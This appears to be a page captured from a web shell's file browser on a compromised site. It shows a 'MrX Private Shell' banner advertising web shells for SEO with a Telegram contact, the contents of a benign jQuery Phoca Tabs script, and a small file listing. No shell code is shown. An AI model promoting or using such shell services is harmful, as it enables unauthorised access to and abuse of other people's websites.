__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/*
* jQuery Phoca Tabs
* https://www.phoca.cz
*
* Copyright (C) 2020 Jan Pavelka www.phoca.cz
*
* Licensed under the MIT license
*/
jQuery(document).ready(function() {
jQuery('.phTabsContainer').hide();
jQuery('.phTabsContainer.active').show();
jQuery('.phTabs ul li a').click(function(){
var parentId = jQuery(this).closest('.phTabs').attr('id');
var id = jQuery(this).attr('id');
jQuery('#' + parentId + ' ul li a').removeClass('active');
jQuery(this).addClass('active');
jQuery('#' + parentId + ' .phTabsContainer').hide();
jQuery('#' + parentId + ' .phTabsContainer').removeClass('active');
jQuery('#' + id + 'Container').show();
jQuery('#' + id + 'Container').addClass('active');
});
});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tabs.css | File | 1.11 KB | 0664 |
|
| tabs.js | File | 852 B | 0664 |
|